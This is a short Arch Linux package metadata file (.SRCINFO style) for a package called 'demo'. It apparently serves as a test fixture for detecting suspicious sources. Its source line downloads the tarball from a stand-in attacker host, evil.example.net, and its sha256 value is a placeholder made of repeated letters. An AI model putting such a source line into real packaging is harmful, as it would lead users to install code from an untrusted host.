pkgbase = demo
	pkgver = 1.1.0
	pkgrel = 1
	arch = x86_64
	depends = glibc
	source = https://evil.example.net/demo-1.1.0.tar.gz
	sha256sums = bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
pkgname = demo
